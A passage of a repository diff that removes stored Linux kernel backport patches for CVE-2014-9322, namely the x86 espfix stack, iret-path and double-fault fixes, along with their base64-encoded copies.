check_tsc_sync_target(); - - /* -+ * Enable the espfix hack for this CPU -+ */ -+#ifdef CONFIG_X86_64 -+ init_espfix_ap(); -+#endif -+ -+ /* - * We need to hold vector_lock so there the set of online cpus - * does not change while we are assigning vectors to cpus. Holding - * this lock ensures we don't half assign or remove an irq from a cpu. -diff --git a/arch/x86/mm/dump_pagetables.c b/arch/x86/mm/dump_pagetables.c -index 0002a3a..e04e677 100644 ---- a/arch/x86/mm/dump_pagetables.c -+++ b/arch/x86/mm/dump_pagetables.c -@@ -30,11 +30,13 @@ - unsigned long start_address; - unsigned long current_address; - const struct addr_marker *marker; -+ unsigned long lines; - }; - - struct addr_marker { - unsigned long start_address; - const char *name; -+ unsigned long max_lines; - }; - - /* indices for address_markers; keep sync'd w/ address_markers below */ -@@ -45,6 +47,7 @@ - LOW_KERNEL_NR, - VMALLOC_START_NR, - VMEMMAP_START_NR, -+ ESPFIX_START_NR, - HIGH_KERNEL_NR, - MODULES_VADDR_NR, - MODULES_END_NR, -@@ -67,6 +70,7 @@ - { PAGE_OFFSET, "Low Kernel Mapping" }, - { VMALLOC_START, "vmalloc() Area" }, - { VMEMMAP_START, "Vmemmap" }, -+ { ESPFIX_BASE_ADDR, "ESPfix Area", 16 }, - { __START_KERNEL_map, "High Kernel Mapping" }, - { MODULES_VADDR, "Modules" }, - { MODULES_END, "End Modules" }, -@@ -163,7 +167,7 @@ - pgprot_t new_prot, int level) - { - pgprotval_t prot, cur; -- static const char units[] = "KMGTPE"; -+ static const char units[] = "BKMGTPE"; - - /* - * If we have a "break" in the series, we need to flush the state that -@@ -178,6 +182,7 @@ - st->current_prot = new_prot; - st->level = level; - st->marker = address_markers; -+ st->lines = 0; - seq_printf(m, "---[ %s ]---\n", st->marker->name); - } else if (prot != cur || level != st->level || - st->current_address >= st->marker[1].start_address) { -@@ -188,17 +193,21 @@ - /* - * Now print the actual finished series - */ -- seq_printf(m, "0x%0*lx-0x%0*lx ", -- width, st->start_address, -- width, 
st->current_address); -+ if (!st->marker->max_lines || -+ st->lines < st->marker->max_lines) { -+ seq_printf(m, "0x%0*lx-0x%0*lx ", -+ width, st->start_address, -+ width, st->current_address); - -- delta = (st->current_address - st->start_address) >> 10; -- while (!(delta & 1023) && unit[1]) { -- delta >>= 10; -- unit++; -+ delta = (st->current_address - st->start_address); -+ while (!(delta & 1023) && unit[1]) { -+ delta >>= 10; -+ unit++; -+ } -+ seq_printf(m, "%9lu%c ", delta, *unit); -+ printk_prot(m, st->current_prot, st->level); - } -- seq_printf(m, "%9lu%c ", delta, *unit); -- printk_prot(m, st->current_prot, st->level); -+ st->lines++; - - /* - * We print markers for special areas of address space, -@@ -206,7 +215,15 @@ - * This helps in the interpretation. - */ - if (st->current_address >= st->marker[1].start_address) { -+ if (st->marker->max_lines && -+ st->lines > st->marker->max_lines) { -+ unsigned long nskip = -+ st->lines - st->marker->max_lines; -+ seq_printf(m, "... %lu entr%s skipped ... \n", -+ nskip, nskip == 1 ? "y" : "ies"); -+ } - st->marker++; -+ st->lines = 0; - seq_printf(m, "---[ %s ]---\n", st->marker->name); - } - -diff --git a/init/main.c b/init/main.c -index 9484f4b..a9e4a76 100644 ---- a/init/main.c -+++ b/init/main.c -@@ -605,6 +605,10 @@ - if (efi_enabled(EFI_RUNTIME_SERVICES)) - efi_enter_virtual_mode(); - #endif -+#ifdef CONFIG_X86_64 -+ /* Should be run before the first non-init thread is created */ -+ init_espfix_bsp(); -+#endif - thread_info_cache_init(); - cred_init(); - fork_init(totalram_pages); diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch.base64 deleted file mode 100644 index 2c64bd6e..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file 
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch
deleted file mode 100644
index 1b5acc63..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-diff --git a/arch/x86/include/asm/espfix.h b/arch/x86/include/asm/espfix.h
-new file mode 100644
-index 0000000..729051c
---- /dev/null
-+++ b/arch/x86/include/asm/espfix.h
-@@ -0,0 +1,16 @@
-+#ifdef _ASM_X86_ESPFIX_H
-+#define _ASM_X86_ESPFIX_H
-+
-+#ifdef CONFIG_X86_64
-+
-+#include
-+
-+DECLARE_PER_CPU_READ_MOSTLY(unsigned long, espfix_stack);
-+DECLARE_PER_CPU_READ_MOSTLY(unsigned long, espfix_waddr);
-+
-+extern void init_espfix_bsp(void);
-+extern void init_espfix_ap(void);
-+
-+#endif /* CONFIG_X86_64 */
-+
-+#endif /* _ASM_X86_ESPFIX_H */
-diff --git a/arch/x86/include/asm/setup.h b/arch/x86/include/asm/setup.h
-index 93797d1..2e327f1 100644
---- a/arch/x86/include/asm/setup.h
-+++ b/arch/x86/include/asm/setup.h
-@@ -60,11 +60,10 @@
- static inline void x86_ce4100_early_setup(void) { }
- #endif
-
--extern void init_espfix_bsp(void);
--extern void init_espfix_ap(void);
--
- #ifndef _SETUP
-
-+#include
-+
- /*
- * This is set up by the setup-routine at boot-time
- */
-diff --git a/arch/x86/kernel/espfix_64.c b/arch/x86/kernel/espfix_64.c
-index 8a64da3..6afbb16 100644
---- a/arch/x86/kernel/espfix_64.c
-+++ b/arch/x86/kernel/espfix_64.c
-@@ -40,6 +40,7 @@
- #include
- #include
- #include
-+#include
-
- /*
- * Note: we only need 6*8 = 48 bytes for the espfix stack, but round
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch.base64
deleted file mode 100644
index cbc57804..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch
deleted file mode 100644
index b5a538da..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch
+++ /dev/null
@@ -1,10 +0,0 @@
-diff --git a/arch/x86/include/asm/espfix.h b/arch/x86/include/asm/espfix.h
-index 729051c..99efebb 100644
---- a/arch/x86/include/asm/espfix.h
-+++ b/arch/x86/include/asm/espfix.h
-@@ -1,4 +1,4 @@
--#ifdef _ASM_X86_ESPFIX_H
-+#ifndef _ASM_X86_ESPFIX_H
- #define _ASM_X86_ESPFIX_H
-
- #ifdef CONFIG_X86_64
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch.base64
deleted file mode 100644
index 02e5bfdf..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL2VzcGZpeC5oIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vZXNwZml4LmgKaW5kZXggNzI5MDUxYy4uOTllZmViYiAxMDA2NDQKLS0tIGEvYXJjaC94ODYvaW5jbHVkZS9hc20vZXNwZml4LmgKKysrIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vZXNwZml4LmgKQEAgLTEsNCArMSw0IEBACi0jaWZkZWYgX0FTTV9YODZfRVNQRklYX0gKKyNpZm5kZWYgX0FTTV9YODZfRVNQRklYX0gKICNkZWZpbmUgX0FTTV9YODZfRVNQRklYX0gKIAogI2lmZGVmIENPTkZJR19YODZfNjQK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch
deleted file mode 100644
index 5a5a49c2..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
-index 4b20846..520cde8 100644
---- a/arch/x86/Kconfig
-+++ b/arch/x86/Kconfig
-@@ -972,6 +972,10 @@
- XFree86 to initialize some video cards via BIOS. Disabling this
- option saves about 6k.
-
-+config X86_ESPFIX64
-+ def_bool y
-+ depends on X86_64
-+
- config TOSHIBA
- tristate "Toshiba Laptop support"
- depends on X86_32
-diff --git a/arch/x86/kernel/Makefile b/arch/x86/kernel/Makefile
-index 0fde293..111eb35 100644
---- a/arch/x86/kernel/Makefile
-+++ b/arch/x86/kernel/Makefile
-@@ -27,7 +27,7 @@
- obj-y += syscall_$(BITS).o
- obj-$(CONFIG_X86_64) += vsyscall_64.o
- obj-$(CONFIG_X86_64) += vsyscall_emu_64.o
--obj-$(CONFIG_X86_64) += espfix_64.o
-+obj-$(CONFIG_X86_ESPFIX64) += espfix_64.o
- obj-y += bootflag.o e820.o
- obj-y += pci-dma.o quirks.o topology.o kdebugfs.o
- obj-y += alternative.o i8253.o pci-nommu.o hw_breakpoint.o
-diff --git a/arch/x86/kernel/smpboot.c b/arch/x86/kernel/smpboot.c
-index 9f009cc..fe86275 100644
---- a/arch/x86/kernel/smpboot.c
-+++ b/arch/x86/kernel/smpboot.c
-@@ -267,7 +267,7 @@
- /*
- * Enable the espfix hack for this CPU
- */
--#ifdef CONFIG_X86_64
-+#ifdef CONFIG_X86_ESPFIX64
- init_espfix_ap();
- #endif
-
-diff --git a/init/main.c b/init/main.c
-index a9e4a76..544cccf 100644
---- a/init/main.c
-+++ b/init/main.c
-@@ -605,7 +605,7 @@
- if (efi_enabled(EFI_RUNTIME_SERVICES))
- efi_enter_virtual_mode();
- #endif
--#ifdef CONFIG_X86_64
-+#ifdef CONFIG_X86_ESPFIX64
- /* Should be run before the first non-init thread is created */
- init_espfix_bsp();
- #endif
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch.base64
deleted file mode 100644
index dd10351b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch
deleted file mode 100644
index 2f014227..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch
+++ /dev/null
@@ -1,195 +0,0 @@ -diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig -index 520cde8..2b6c572 100644 ---- a/arch/x86/Kconfig -+++ b/arch/x86/Kconfig -@@ -967,14 +967,27 @@ - default y - depends on X86_32 - ---help--- -- This option is required by programs like DOSEMU to run 16-bit legacy -- code on X86 processors. It also may be needed by software like -- XFree86 to initialize some video cards via BIOS. Disabling this -- option saves about 6k. -+ This option is required by programs like DOSEMU to run -+ 16-bit real mode legacy code on x86 processors. It also may -+ be needed by software like XFree86 to initialize some video -+ cards via BIOS. Disabling this option saves about 6K. -+ -+config X86_16BIT -+ bool "Enable support for 16-bit segments" if EXPERT -+ default y -+ ---help--- -+ This option is required by programs like Wine to run 16-bit -+ protected mode legacy code on x86 processors. Disabling -+ this option saves about 300 bytes on i386, or around 6K text -+ plus 16K runtime memory on x86-64, -+ -+config X86_ESPFIX32 -+ def_bool y -+ depends on X86_16BIT && X86_32 - - config X86_ESPFIX64 - def_bool y -- depends on X86_64 -+ depends on X86_16BIT && X86_64 - - config TOSHIBA - tristate "Toshiba Laptop support" -diff --git a/arch/x86/kernel/entry_32.S b/arch/x86/kernel/entry_32.S -index 41baa1f..e758e2f 100644 ---- a/arch/x86/kernel/entry_32.S -+++ b/arch/x86/kernel/entry_32.S -@@ -530,6 +530,7 @@ - restore_all: - TRACE_IRQS_IRET - restore_all_notrace: -+#ifdef CONFIG_X86_ESPFIX32 - movl PT_EFLAGS(%esp), %eax # mix EFLAGS, SS and CS - # Warning: PT_OLDSS(%esp) contains the wrong/random values if we - # are returning to the kernel. 
-@@ -540,6 +541,7 @@ - cmpl $((SEGMENT_LDT << 8) | USER_RPL), %eax - CFI_REMEMBER_STATE - je ldt_ss # returning to user-space with LDT SS -+#endif - restore_nocheck: - RESTORE_REGS 4 # skip orig_eax/error_code - irq_return: -@@ -552,6 +554,7 @@ - .previous - _ASM_EXTABLE(irq_return,iret_exc) - -+#ifdef CONFIG_X86_ESPFIX32 - CFI_RESTORE_STATE - ldt_ss: - #ifdef CONFIG_PARAVIRT -@@ -595,6 +598,7 @@ - lss (%esp), %esp /* switch to espfix segment */ - CFI_ADJUST_CFA_OFFSET -8 - jmp restore_nocheck -+#endif - CFI_ENDPROC - ENDPROC(system_call) - -@@ -702,6 +706,7 @@ - * the high word of the segment base from the GDT and swiches to the - * normal stack and adjusts ESP with the matching offset. - */ -+#ifdef CONFIG_X86_ESPFIX32 - /* fixup the stack */ - mov GDT_ESPFIX_SS + 4, %al /* bits 16..23 */ - mov GDT_ESPFIX_SS + 7, %ah /* bits 24..31 */ -@@ -711,8 +716,10 @@ - pushl_cfi %eax - lss (%esp), %esp /* switch to the normal stack segment */ - CFI_ADJUST_CFA_OFFSET -8 -+#endif - .endm - .macro UNWIND_ESPFIX_STACK -+#ifdef CONFIG_X86_ESPFIX32 - movl %ss, %eax - /* see if on espfix stack */ - cmpw $__ESPFIX_SS, %ax -@@ -723,6 +730,7 @@ - /* switch to normal stack */ - FIXUP_ESPFIX_STACK - 27: -+#endif - .endm - - /* -@@ -1330,11 +1338,13 @@ - ENTRY(nmi) - RING0_INT_FRAME - ASM_CLAC -+#ifdef CONFIG_X86_ESPFIX32 - pushl_cfi %eax - movl %ss, %eax - cmpw $__ESPFIX_SS, %ax - popl_cfi %eax - je nmi_espfix_stack -+#endif - cmpl $ia32_sysenter_target,(%esp) - je nmi_stack_fixup - pushl_cfi %eax -@@ -1374,6 +1384,7 @@ - FIX_STACK 24, nmi_stack_correct, 1 - jmp nmi_stack_correct - -+#ifdef CONFIG_X86_ESPFIX32 - nmi_espfix_stack: - /* We have a RING0_INT_FRAME here. 
- * -@@ -1395,6 +1406,7 @@ - lss 12+4(%esp), %esp # back to espfix stack - CFI_ADJUST_CFA_OFFSET -24 - jmp irq_return -+#endif - CFI_ENDPROC - END(nmi) - -diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S -index 75ccdc1..f9315d9 100644 ---- a/arch/x86/kernel/entry_64.S -+++ b/arch/x86/kernel/entry_64.S -@@ -1060,8 +1060,10 @@ - * Are we returning to a stack segment from the LDT? Note: in - * 64-bit mode SS:RSP on the exception stack is always valid. - */ -+#ifdef CONFIG_X86_ESPFIX64 - testb $4,(SS-RIP)(%rsp) - jnz irq_return_ldt -+#endif - - irq_return_iret: - INTERRUPT_RETURN -@@ -1073,6 +1075,7 @@ - _ASM_EXTABLE(native_iret, bad_iret) - #endif - -+#ifdef CONFIG_X86_ESPFIX64 - irq_return_ldt: - pushq_cfi %rax - pushq_cfi %rdi -@@ -1096,6 +1099,7 @@ - movq %rax,%rsp - popq_cfi %rax - jmp irq_return_iret -+#endif - - .section .fixup,"ax" - bad_iret: -@@ -1169,6 +1173,7 @@ - * modify the stack to make it look like we just entered - * the #GP handler from user space, similar to bad_iret. - */ -+#ifdef CONFIG_X86_ESPFIX64 - ALIGN - __do_double_fault: - XCPT_FRAME 1 RDI+8 -@@ -1194,6 +1199,9 @@ - retq - CFI_ENDPROC - END(__do_double_fault) -+#else -+# define __do_double_fault do_double_fault -+#endif - - /* - * End of kprobes section -diff --git a/arch/x86/kernel/ldt.c b/arch/x86/kernel/ldt.c -index ebc9873..c37886d 100644 ---- a/arch/x86/kernel/ldt.c -+++ b/arch/x86/kernel/ldt.c -@@ -229,6 +229,11 @@ - } - } - -+ if (!IS_ENABLED(CONFIG_X86_16BIT) && !ldt_info.seg_32bit) { -+ error = -EINVAL; -+ goto out_unlock; -+ } -+ - fill_ldt(&ldt, &ldt_info); - if (oldmode) - ldt.avl = 0; diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch.base64 deleted file mode 100644 index 76214aea..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file 
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch
deleted file mode 100644
index a927275d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch
+++ /dev/null
@@ -1,105 +0,0 @@ -diff --git a/arch/x86/include/asm/irqflags.h b/arch/x86/include/asm/irqflags.h -index bba3cf8..0a8b519 100644 ---- a/arch/x86/include/asm/irqflags.h -+++ b/arch/x86/include/asm/irqflags.h -@@ -129,7 +129,7 @@ - - #define PARAVIRT_ADJUST_EXCEPTION_FRAME /* */ - --#define INTERRUPT_RETURN iretq -+#define INTERRUPT_RETURN jmp native_iret - #define USERGS_SYSRET64 \ - swapgs; \ - sysretq; -diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S -index f9315d9..db230f8 100644 ---- a/arch/x86/kernel/entry_64.S -+++ b/arch/x86/kernel/entry_64.S -@@ -1056,27 +1056,24 @@ - RESTORE_ARGS 1,8,1 - - irq_return: -+ INTERRUPT_RETURN -+ -+ENTRY(native_iret) - /* - * Are we returning to a stack segment from the LDT? Note: in - * 64-bit mode SS:RSP on the exception stack is always valid. - */ - #ifdef CONFIG_X86_ESPFIX64 - testb $4,(SS-RIP)(%rsp) -- jnz irq_return_ldt -+ jnz native_irq_return_ldt - #endif - --irq_return_iret: -- INTERRUPT_RETURN -- _ASM_EXTABLE(irq_return_iret, bad_iret) -- --#ifdef CONFIG_PARAVIRT --ENTRY(native_iret) -+native_irq_return_iret: - iretq -- _ASM_EXTABLE(native_iret, bad_iret) --#endif -+ _ASM_EXTABLE(native_irq_return_iret, bad_iret) - - #ifdef CONFIG_X86_ESPFIX64 --irq_return_ldt: -+native_irq_return_ldt: - pushq_cfi %rax - pushq_cfi %rdi - SWAPGS -@@ -1098,7 +1095,7 @@ - SWAPGS - movq %rax,%rsp - popq_cfi %rax -- jmp irq_return_iret -+ jmp native_irq_return_iret - #endif - - .section .fixup,"ax" -@@ -1184,13 +1181,8 @@ - cmpl $__KERNEL_CS,CS(%rdi) - jne do_double_fault - movq RIP(%rdi),%rax -- cmpq $irq_return_iret,%rax --#ifdef CONFIG_PARAVIRT -- je 1f -- cmpq $native_iret,%rax --#endif -+ cmpq $native_irq_return_iret,%rax - jne do_double_fault /* This shouldn't happen... 
*/ --1: - movq PER_CPU_VAR(kernel_stack),%rax - subq $(6*8-KERNEL_STACK_OFFSET),%rax /* Reset to original stack */ - movq %rax,RSP(%rdi) -@@ -1658,7 +1650,7 @@ - */ - error_kernelspace: - incl %ebx -- leaq irq_return_iret(%rip),%rcx -+ leaq native_irq_return_iret(%rip),%rcx - cmpq %rcx,RIP+8(%rsp) - je error_swapgs - movl %ecx,%eax /* zero extend */ -diff --git a/arch/x86/kernel/paravirt_patch_64.c b/arch/x86/kernel/paravirt_patch_64.c -index 3f08f34..a1da673 100644 ---- a/arch/x86/kernel/paravirt_patch_64.c -+++ b/arch/x86/kernel/paravirt_patch_64.c -@@ -6,7 +6,6 @@ - DEF_NATIVE(pv_irq_ops, irq_enable, "sti"); - DEF_NATIVE(pv_irq_ops, restore_fl, "pushq %rdi; popfq"); - DEF_NATIVE(pv_irq_ops, save_fl, "pushfq; popq %rax"); --DEF_NATIVE(pv_cpu_ops, iret, "iretq"); - DEF_NATIVE(pv_mmu_ops, read_cr2, "movq %cr2, %rax"); - DEF_NATIVE(pv_mmu_ops, read_cr3, "movq %cr3, %rax"); - DEF_NATIVE(pv_mmu_ops, write_cr3, "movq %rdi, %cr3"); -@@ -50,7 +49,6 @@ - PATCH_SITE(pv_irq_ops, save_fl); - PATCH_SITE(pv_irq_ops, irq_enable); - PATCH_SITE(pv_irq_ops, irq_disable); -- PATCH_SITE(pv_cpu_ops, iret); - PATCH_SITE(pv_cpu_ops, irq_enable_sysexit); - PATCH_SITE(pv_cpu_ops, usergs_sysret32); - PATCH_SITE(pv_cpu_ops, usergs_sysret64); diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch.base64 deleted file mode 100644 index d448a70d..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0007.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch deleted file mode 100644 index 97c06b01..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch +++ /dev/null 
@@ -1,30 +0,0 @@ -diff --git a/arch/x86/kernel/espfix_64.c b/arch/x86/kernel/espfix_64.c -index 6afbb16..94d857f 100644 ---- a/arch/x86/kernel/espfix_64.c -+++ b/arch/x86/kernel/espfix_64.c -@@ -175,7 +175,7 @@ - if (!pud_present(pud)) { - pmd_p = (pmd_t *)__get_free_page(PGALLOC_GFP); - pud = __pud(__pa(pmd_p) | (PGTABLE_PROT & ptemask)); -- paravirt_alloc_pud(&init_mm, __pa(pmd_p) >> PAGE_SHIFT); -+ paravirt_alloc_pmd(&init_mm, __pa(pmd_p) >> PAGE_SHIFT); - for (n = 0; n < ESPFIX_PUD_CLONES; n++) - set_pud(&pud_p[n], pud); - } -@@ -185,7 +185,7 @@ - if (!pmd_present(pmd)) { - pte_p = (pte_t *)__get_free_page(PGALLOC_GFP); - pmd = __pmd(__pa(pte_p) | (PGTABLE_PROT & ptemask)); -- paravirt_alloc_pmd(&init_mm, __pa(pte_p) >> PAGE_SHIFT); -+ paravirt_alloc_pte(&init_mm, __pa(pte_p) >> PAGE_SHIFT); - for (n = 0; n < ESPFIX_PMD_CLONES; n++) - set_pmd(&pmd_p[n], pmd); - } -@@ -193,7 +193,6 @@ - pte_p = pte_offset_kernel(&pmd, addr); - stack_page = (void *)__get_free_page(GFP_KERNEL); - pte = __pte(__pa(stack_page) | (__PAGE_KERNEL_RO & ptemask)); -- paravirt_alloc_pte(&init_mm, __pa(stack_page) >> PAGE_SHIFT); - for (n = 0; n < ESPFIX_PTE_CLONES; n++) - set_pte(&pte_p[n*PTE_STRIDE], pte); - diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch.base64 deleted file mode 100644 index e39e62e5..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0008.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch deleted file mode 100644 index f655537a..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch +++ /dev/null 
@@ -1,94 +0,0 @@ -diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S -index db230f8..1a454d0 100644 ---- a/arch/x86/kernel/entry_64.S -+++ b/arch/x86/kernel/entry_64.S -@@ -1068,6 +1068,7 @@ - jnz native_irq_return_ldt - #endif - -+.global native_irq_return_iret - native_irq_return_iret: - iretq - _ASM_EXTABLE(native_irq_return_iret, bad_iret) -@@ -1164,37 +1165,6 @@ - CFI_ENDPROC - END(common_interrupt) - -- /* -- * If IRET takes a fault on the espfix stack, then we -- * end up promoting it to a doublefault. In that case, -- * modify the stack to make it look like we just entered -- * the #GP handler from user space, similar to bad_iret. -- */ --#ifdef CONFIG_X86_ESPFIX64 -- ALIGN --__do_double_fault: -- XCPT_FRAME 1 RDI+8 -- movq RSP(%rdi),%rax /* Trap on the espfix stack? */ -- sarq $PGDIR_SHIFT,%rax -- cmpl $ESPFIX_PGD_ENTRY,%eax -- jne do_double_fault /* No, just deliver the fault */ -- cmpl $__KERNEL_CS,CS(%rdi) -- jne do_double_fault -- movq RIP(%rdi),%rax -- cmpq $native_irq_return_iret,%rax -- jne do_double_fault /* This shouldn't happen... 
*/ -- movq PER_CPU_VAR(kernel_stack),%rax -- subq $(6*8-KERNEL_STACK_OFFSET),%rax /* Reset to original stack */ -- movq %rax,RSP(%rdi) -- movq $0,(%rax) /* Missing (lost) #GP error code */ -- movq $general_protection,RIP(%rdi) -- retq -- CFI_ENDPROC --END(__do_double_fault) --#else --# define __do_double_fault do_double_fault --#endif -- - /* - * End of kprobes section - */ -@@ -1363,7 +1333,7 @@ - zeroentry bounds do_bounds - zeroentry invalid_op do_invalid_op - zeroentry device_not_available do_device_not_available --paranoiderrorentry double_fault __do_double_fault -+paranoiderrorentry double_fault do_double_fault - zeroentry coprocessor_segment_overrun do_coprocessor_segment_overrun - errorentry invalid_TSS do_invalid_TSS - errorentry segment_not_present do_segment_not_present -diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c -index 772e2a8..74e0801 100644 ---- a/arch/x86/kernel/traps.c -+++ b/arch/x86/kernel/traps.c -@@ -247,6 +247,30 @@ - static const char str[] = "double fault"; - struct task_struct *tsk = current; - -+#ifdef CONFIG_X86_ESPFIX64 -+ extern unsigned char native_irq_return_iret[]; -+ -+ /* -+ * If IRET takes a non-IST fault on the espfix64 stack, then we -+ * end up promoting it to a doublefault. In that case, modify -+ * the stack to make it look like we just entered the #GP -+ * handler from user space, similar to bad_iret. -+ */ -+ if (((long)regs->sp >> PGDIR_SHIFT) == ESPFIX_PGD_ENTRY && -+ regs->cs == __KERNEL_CS && -+ regs->ip == (unsigned long)native_irq_return_iret) -+ { -+ struct pt_regs *normal_regs = task_pt_regs(current); -+ -+ /* Fake a #GP(0) from userspace. 
*/ -+ memmove(&normal_regs->ip, (void *)regs->sp, 5*8); -+ normal_regs->orig_ax = 0; /* Missing (lost) #GP error code */ -+ regs->ip = (unsigned long)general_protection; -+ regs->sp = (unsigned long)&normal_regs->orig_ax; -+ return; -+ } -+#endif -+ - exception_enter(); - /* Return not checked because double check cannot be ignored */ - notify_die(DIE_TRAP, str, regs, error_code, X86_TRAP_DF, SIGSEGV); diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch.base64 deleted file mode 100644 index 59821700..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0009.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch deleted file mode 100644 index 3214fe2e..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch +++ /dev/null 
@@ -1,101 +0,0 @@ -diff --git a/arch/x86/include/asm/page_32_types.h b/arch/x86/include/asm/page_32_types.h -index ef17af0..4376b45 100644 ---- a/arch/x86/include/asm/page_32_types.h -+++ b/arch/x86/include/asm/page_32_types.h -@@ -18,7 +18,6 @@ - #define THREAD_SIZE_ORDER 1 - #define THREAD_SIZE (PAGE_SIZE << THREAD_SIZE_ORDER) - --#define STACKFAULT_STACK 0 - #define DOUBLEFAULT_STACK 1 - #define NMI_STACK 0 - #define DEBUG_STACK 0 -diff --git a/arch/x86/include/asm/page_64_types.h b/arch/x86/include/asm/page_64_types.h -index 6c896fb..970f309 100644 ---- a/arch/x86/include/asm/page_64_types.h -+++ b/arch/x86/include/asm/page_64_types.h -@@ -14,12 +14,11 @@ - #define IRQ_STACK_ORDER 2 - #define IRQ_STACK_SIZE (PAGE_SIZE << IRQ_STACK_ORDER) - --#define STACKFAULT_STACK 1 --#define DOUBLEFAULT_STACK 2 --#define NMI_STACK 3 --#define DEBUG_STACK 4 --#define MCE_STACK 5 --#define N_EXCEPTION_STACKS 5 /* hw limit: 7 */ -+#define DOUBLEFAULT_STACK 1 -+#define NMI_STACK 2 -+#define DEBUG_STACK 3 -+#define MCE_STACK 4 -+#define N_EXCEPTION_STACKS 4 /* hw limit: 7 */ - - #define PUD_PAGE_SIZE (_AC(1, UL) << PUD_SHIFT) - #define PUD_PAGE_MASK (~(PUD_PAGE_SIZE-1)) -diff --git a/arch/x86/kernel/dumpstack_64.c b/arch/x86/kernel/dumpstack_64.c -index addb207..66e274a 100644 ---- a/arch/x86/kernel/dumpstack_64.c -+++ b/arch/x86/kernel/dumpstack_64.c -@@ -24,7 +24,6 @@ - [ DEBUG_STACK-1 ] = "#DB", - [ NMI_STACK-1 ] = "NMI", - [ DOUBLEFAULT_STACK-1 ] = "#DF", -- [ STACKFAULT_STACK-1 ] = "#SS", - [ MCE_STACK-1 ] = "#MC", - #if DEBUG_STKSZ > EXCEPTION_STKSZ - [ N_EXCEPTION_STACKS ... 
